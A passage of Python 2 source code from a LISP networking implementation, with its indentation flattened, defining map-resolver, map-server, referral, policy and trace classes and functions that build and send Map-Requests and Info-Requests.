mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if number of A-records have changed and this one is no longer
# valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If pull-based decent DNS suffix, then create other lisp_ms() for
# all A-records. Only have master to this (A-record index 0).
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s = s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#entry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Check IGMP packet first. And don't do IP checksum and don't test TTL.
#
if (ord(packet[9]) == 2): return([True, packet])
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return([False, None])
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return([False, None])
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return([False, None])
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return([False, packet])
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv6 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
#
# Check for IPv6 link-local addresses. They should not go on overlay.
#
if (dest.is_ipv6_link_local()):
dprint("Do not encapsulate IPv6 link-local packets")
return(None)
#endif
ttl -= 1
packet = packet[0:7] + struct.pack("B", ttl) + packet[8::]
return(packet)
#enddef
#
# lisp_mac_input
#
# Process MAC data frame for input checking. All we need to do is get the
# destination MAC address.
#
def lisp_mac_input(packet):
return(packet)
#enddef
#
# lisp_rate_limit_map_request
#
# Check to see if we have sent a data-triggered Map-Request in the last
# LISP_MAP_REQUEST_RATE_LIMIT seconds. Return True if we should not send
# a Map-Request (rate-limit it).
#
def lisp_rate_limit_map_request(dest):
now = lisp_get_timestamp()
#
# Do we have rate-limiting disabled temporarily?
#
elapsed = now - lisp_no_map_request_rate_limit
if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
left = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
dprint("No Rate-Limit Mode for another {} secs".format(left))
return(False)
#endif
#
# Do we send a Map-Request recently?
#
if (lisp_last_map_request_sent == None): return(False)
elapsed = now - lisp_last_map_request_sent
rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)
if (rate_limit):
dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format( \
green(dest.print_address(), False), round(elapsed, 3)))
#endif
return(rate_limit)
#enddef
#
# lisp_send_map_request
#
# From this process, build and send a Map-Request for supplied EID.
#
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
global lisp_last_map_request_sent
#
# Set RLOC-probe parameters if caller wants Map-Request to be an
# RLOC-probe. We use probe_port as 4341 so we the ITR and RTR keying data
# structures can be the same.
#
probe_dest = probe_port = None
if (rloc):
probe_dest = rloc.rloc
probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT
#endif
#
# If there are no RLOCs found, do not build and send the Map-Request.
#
itr_rloc4, itr_rloc6, device = lisp_myrlocs
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, IPv4 RLOC not found")
return
#endif
if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
lprint("Suppress sending Map-Request, IPv6 RLOC not found")
return
#endif
map_request = lisp_map_request()
map_request.record_count = 1
map_request.nonce = lisp_get_control_nonce()
map_request.rloc_probe = (probe_dest != None)
#
# Hold request nonce so we can match replies from xTRs that have multiple
# RLOCs. Reason being is because source address may not be the probed
# destination. And on our ETR implementation, we can get the probe request
# destination in the lisp-core/lisp-etr/lisp-rtr processes.
#
if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce
sg = deid.is_multicast_address()
if (sg):
map_request.target_eid = seid
map_request.target_group = deid
else:
map_request.target_eid = deid
#endif
#
# If lookup is for an IPv6 EID or there is a signature key configured and
# there is a private key file in current directory, tell lisp_map_request()
# to sign Map-Request. For an RTR, we want to verify its map-request
# signature, so it needs to include its own IPv6 EID that matches the
# private-key file.
#
if (map_request.rloc_probe == False):
db = lisp_get_signature_eid()
if (db):
map_request.signature_eid.copy_address(db.eid)
map_request.privkey_filename = "./lisp-sig.pem"
#endif
#endif
#
# Fill in source-eid field.
#
if (seid == None or sg):
map_request.source_eid.afi = LISP_AFI_NONE
else:
map_request.source_eid = seid
#endif
#
# If ITR-RLOC is a private IPv4 address, we need it to be a global address
# for RLOC-probes.
#
# However, if we are an RTR and have a private address, the RTR is behind
# a NAT. The RLOC-probe is encapsulated with source-port 4341 to get
# through NAT. The ETR receiving the RLOC-probe request must return the
# RLOC-probe reply with same translated address/port pair (the same values
# when it encapsulates data packets).
#
if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
if (probe_dest.is_private_address() == False):
itr_rloc4 = lisp_get_any_translated_rloc()
#endif
if (itr_rloc4 == None):
lprint("Suppress sending Map-Request, translated RLOC not found")
return
#endif
#endif
#
# Fill in ITR-RLOCs field. If we don't find an IPv6 address there is
# nothing to store in the ITR-RLOCs list. And we have to use an inner
# source address of 0::0.
#
if (probe_dest == None or probe_dest.is_ipv4()):
if (lisp_nat_traversal and probe_dest == None):
ir = lisp_get_any_translated_rloc()
if (ir != None): itr_rloc4 = ir
#endif
map_request.itr_rlocs.append(itr_rloc4)
#endif
if (probe_dest == None or probe_dest.is_ipv6()):
if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
itr_rloc6 = None
else:
map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
map_request.itr_rlocs.append(itr_rloc6)
#endif
#endif
#
# Decide what inner source address needs to be for the ECM. We have to
# look at the address-family of the destination EID. If the destination-EID
# is a MAC address, we will use IPv4 in the inner header with a destination
# address of 0.0.0.0.
#
if (probe_dest != None and map_request.itr_rlocs != []):
itr_rloc = map_request.itr_rlocs[0]
else:
if (deid.is_ipv4()):
itr_rloc = itr_rloc4
elif (deid.is_ipv6()):
itr_rloc = itr_rloc6
else:
itr_rloc = itr_rloc4
#endif
#endif
#
# And finally add one EID record. The EID we are looking up.
#
packet = map_request.encode(probe_dest, probe_port)
map_request.print_map_request()
#
# If this is an RLOC-probe, send directly to RLOC and not to mapping
# system. If the RLOC is behind a NAT, we need to data encapsulate it
# from port 4341 to translated destination address and port.
#
if (probe_dest != None):
if (rloc.is_rloc_translated()):
nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)
#
# Handle gleaned RLOC case.
#
if (nat_info == None):
r = rloc.rloc.print_address_no_iid()
g = "gleaned-{}".format(r)
p = rloc.translated_port
nat_info = lisp_nat_info(r, g, p)
#endif
lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
packet)
return
#endif
addr_str = probe_dest.print_address_no_iid()
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#endif
#
# Get least recently used Map-Resolver. In the RTR make sure there is a
# Map-Resolver in lisp.config with no mr-name or mr-name=all.
#
local_eid = None if lisp_i_am_rtr else seid
if (lisp_decent_pull_xtr_configured()):
mr = lisp_get_decent_map_resolver(deid)
else:
mr = lisp_get_map_resolver(None, local_eid)
#endif
if (mr == None):
lprint("Cannot find Map-Resolver for source-EID {}".format( \
green(seid.print_address(), False)))
return
#endif
mr.last_used = lisp_get_timestamp()
mr.map_requests_sent += 1
if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce
#
# Send ECM based Map-Request to Map-Resolver.
#
if (seid == None): seid = itr_rloc
lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
mr.map_resolver)
#
# Set global timestamp for Map-Request rate-limiting.
#
lisp_last_map_request_sent = lisp_get_timestamp()
#
# Do DNS lookup for Map-Resolver if "dns-name" configured.
#
mr.resolve_dns_name()
return
#enddef
#
# lisp_send_info_request
#
# Send info-request to any map-server configured or to an address supplied
# by the caller.
#
def lisp_send_info_request(lisp_sockets, dest, port, device_name):
#
# Build Info-Request message.
#
info = lisp_info()
info.nonce = lisp_get_control_nonce()
if (device_name): info.hostname += "-" + device_name
addr_str = dest.print_address_no_iid()
#
# Find next-hop for interface 'device_name' if supplied. The "ip route"
# command will produce this:
#
# pi@lisp-pi ~/lisp $ ip route | egrep "default via"
# default via 192.168.1.1 dev eth1
# default via 192.168.1.1 dev wlan0
#
# We then turn the line we want into a "ip route add" command. Then at
# the end of this function we remove the route.
#
# We do this on the ETR only so we don't have Info-Requests from the lisp-
# itr and lisp-etr process both add and delete host routes (for Info-
# Request sending purposes) at the same time.
#
added_route = False
if (device_name):
save_nh = lisp_get_host_route_next_hop(addr_str)
#
# If we found a host route for the map-server, then both the lisp-itr
# and lisp-etr processes are in this routine at the same time.
# wait for the host route to go away before proceeding. We will use
# the map-server host route as a IPC lock. For the data port, only
# the lisp-etr processes will add host route to the RTR for Info-
# Requests.
#
if (port == LISP_CTRL_PORT and save_nh != None):
while (True):
time.sleep(.01)
save_nh = lisp_get_host_route_next_hop(addr_str)
if (save_nh == None): break
#endwhile
#endif
default_routes = lisp_get_default_route_next_hops()
for device, nh in default_routes:
if (device != device_name): continue
#
# If there is a data route pointing to same next-hop, don't
# change the routing table. Otherwise, remove saved next-hop,
# add the one we want and later undo this.
#
if (save_nh != nh):
if (save_nh != None):
lisp_install_host_route(addr_str, save_nh, False)
#endif
lisp_install_host_route(addr_str, nh, True)
added_route = True
#endif
break
#endfor
#endif
#
# Encode the Info-Request message and print it.
#
packet = info.encode()
info.print_info()
#
# Send it.
#
cd = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
cd = bold(cd, False)
p = bold("{}".format(port), False)
a = red(addr_str, False)
rtr = "RTR " if port == LISP_DATA_PORT else "MS "
lprint("Send Info-Request to {}{}, port {} {}".format(rtr, a, p, cd))
#
# Send packet to control port via control-sockets interface. For a 4341
# do the same via the lisp-core process but prepend a LISP data header
# to the message.
#
if (port == LISP_CTRL_PORT):
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
else:
header = lisp_data_header()
header.instance_id(0xffffff)
header = header.encode()
if (header):
packet = header + packet
#
# The NAT-traversal spec says to use port 4342 as the source port
# but that would mean return data packets will go to the lisp-core
# process. We are going to use an ephemeral port here so packets
# come to this lisp-etr process. The commented out call is to
# allow Info-Requests to use source port 4342 but will break the
# data-plane in this lispers.net implementation.
#
lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)
# lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
#endif
#endif
#
# Remove static route to RTR if had added one and restore data route.
#
if (added_route):
lisp_install_host_route(addr_str, None, False)
